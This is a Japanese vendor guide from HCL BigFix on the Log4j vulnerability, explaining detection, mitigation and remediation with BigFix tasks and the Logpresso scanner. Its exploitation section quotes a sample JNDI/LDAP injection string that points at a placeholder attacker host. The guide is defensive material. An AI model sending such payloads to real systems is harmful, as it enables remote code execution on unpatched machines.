HCL BigFix ガイド

この脆弱性について

これは、Apache 財団によって開発され、維持されている人気の Java ライブラリである Apache Log4j で発見された脆弱性です。Log4j ライブラリは、Java ロギングルーチンとして、多くの商用およびオープンソースのソフトウェア製品で広く使用されています。この脆弱性の重大度は、MITRE.org の Common Vulnerability Scoring System　(CVSS) で 10/10 と評価されており、深刻な脆弱性であることが示されています。   

悪用方法

Log4j は、不正な攻撃者によってリモートコード実行 (RCE) を使用してリモートで悪用される可能性があります。攻撃者が ${jndi:ldap://dirtyLDAP.com/X}) などの文字列を含むメッセージを送信すると、外部のコードクラスまたはメッセージルックアップが認証を行うことなく悪意のあるコードを実行する可能性があります。

影響を受けるデバイス

政府、営利企業、家庭のコンピュータなど、数億台ものデバイスが危険にさらされています。また、ロギングはあらゆるコンピューティングにおいて非常に一般的なアクションであるため、影響を受ける各デバイスには脆弱なコードが存在する場所が数十または数百か所ある可能性があります。

HCL BigFix のメリット

HCL BigFix チームは、顧客、セキュリティ専門家、IT 運用部門と協力して HCL BigFix コンテンツを作成し、顧客の環境内にある Log4j の脆弱性を特定して修正するお手伝いをします。

HCL BigFix は、IT 運用部門に不可欠なツールです。HCL BigFix は、OS、場所、接続性に関係なく、オンプレミス、モバイル、バーチャル、クラウドのすべてのエンドポイントの検出、管理、修復を自動化します。HCL BigFix Insights for Vulnerability Remediation は Tenable などの有数の脆弱性管理ソリューションと統合でき、市場の他のどのソリューションよりも迅速に Log4j などの脆弱性を修復できます。

HCL BigFix を使用することで、脆弱性の検出、緩和、修復、修復前後のレポート作成、修復対象のエンドポイントの保護を行うことができます。

検出

HCL BigFix は、HCL BigFix ユーザーが Log4j のインスタンスと脆弱性を発見するのに役立つタスクを開発しました。当社は Logpresso Log4j スキャナーを使用しました。これは Logpresso の技術チームが開発した GitHub 上で利用できるオープンソースの Java ベースのスキャナーであり、サイバーセキュリティコミュニティーが自由に利用できるからです。

このタスクは、スキャンを実行するために一時的な Java ランタイムをダウンロードします。システムに Java をインストールする必要はありません。このタスクは、Windows 8.1 以降 (x86 および x64)、Mac OS X、Linux (x86、x64、armv71、ppc64、ppc64LE、s390x)、AIX 7.1 TL4 以降、Solaris (x86 および SPARC) で動作します。JRE を手作業でダウンロードすれば、HP-UX でもこのタスクを実行できます。

次の 4 つの手順は、脆弱性を検出して報告するための一般的なプロセスを示しています。
 

1. 「BES Inventory and License」コンテンツサイトから、Task 602「Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – SCAN only」を実行します。
 

2. 「BES Inventory and License」コンテンツサイトから、Analysis 601「log4j2-scan results」を有効にします。
 

3. スキャン結果が HCL BigFix Server にアップロードされた後、Analysis で詳細なスキャン結果を表示します。下の画像を参照してください。
 

4. エグゼクティブレポートの作成には、HCL BigFix Web レポートにある「Log4j Vulnerability Report (Logpresso Scan)」ビューを使用します。

緩和

アプリケーションベンダーからパッチを入手できるようになる前に、Log4j のリスクを緩和する方法が 2 つあります。

1. Logpresso Log4j-scan ユーティリティーを使用して、影響を受ける Log4j-core JAR ファイルから脆弱な Java クラスを削除します。これを行うための HCL BigFix タスクは、「BES Inventory and License」コンテンツサイトから利用できます。Task 603 (Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – WITH REMEDIATION) というタスクです。
Logpresso Log4j-scan ユーティリティーは、Log4j 2.x と Log4j 1.x の両方に対して、影響を受ける Log4j-Core JAR ライブラリの多少の修復を実行できます。このユーティリティーは、CVE の最悪の部分を緩和しますが、サービス妨害ベースのすべての脆弱性を緩和するわけではありません。しかし、このユーティリティーは、既存のアプリケーションとの後方互換性を維持しながら保護を提供するための非常に効果的なステップとなり得ます。このツールで実行できる具体的な緩和策の詳細については、https://github.com/logpresso/CVE-2021-44228-Scanner を参照してください。

2. 影響を受けるアプリケーションまたはサービスを停止または無効にします。
 

修復

ベンダーからパッチを入手できるようになると、HCL BigFix は HCL BigFix Fixlet を迅速に作成、テスト、配信します。Log4j の脆弱性を修復する HCL BigFix Fixlet の最新リストは、https://www.hcl-software.com/jp/products/bigfix/log4j-ivrからダウンロードできます。
 

レポート

BigFix では、さまざまな時点の脆弱性と緩和のステータスを示す HCL BigFix Web レポートを使用して、影響を受けるシステムとライブラリのレポートを表示およびアーカイブできます。
 

保護

この脆弱性の修復後、HCL BigFix はこの脆弱性が再発しないようにすることができます。BigFix を使用すれば、利用可能な検出タスクを使用して定期的なスキャンをスケジュールできます。これにより、Log4j の脆弱性が存在する新しいシステムやソフトウェアを特定して修復できます。

さらにサポートが必要な場合は、HCL BigFix フォーラムを検索するか、HCL BigFix プロフェッショナルサービスまた<>はテクニカルサポートへお問い合わせください。